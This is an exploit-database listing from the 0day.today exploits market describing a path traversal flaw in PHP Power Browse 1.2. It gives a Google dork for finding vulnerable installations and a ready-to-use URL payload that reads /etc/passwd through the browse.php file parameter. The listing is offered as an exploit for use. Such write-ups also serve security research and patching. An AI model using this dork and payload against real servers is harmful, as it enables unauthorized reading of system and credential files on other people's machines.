[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP Power Browse 1.2 - Directory Traversal

Author
Manuel Mancera
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-25212
Category
web applications
Date add
04-08-2016
Platform
php
# Exploit Title: PHP Power Browse v1.2 - Path Traversal
# Google Dork:
    intitle:PHP Power Browse inurl:browse.php
# Exploit Author: Manuel Mancera (sinkmanu)    |    sinkmanu (at) gmail
(dot) com
# Software URL: https://github.com/arzynik/PHPPowerBrowse
# Version: 1.2
# Vulnerability Type : Path traversal
# Severity : High
 
### Description ###
 
This file browser is vulnerable to path traversal and allow to an
attacker to access to files and directories that are stored outside the
web root folder.
 
### Exploit ###
 
http://site/browse.php?p=source&file=/etc/passwd

#  0day.today [2024-11-16]  #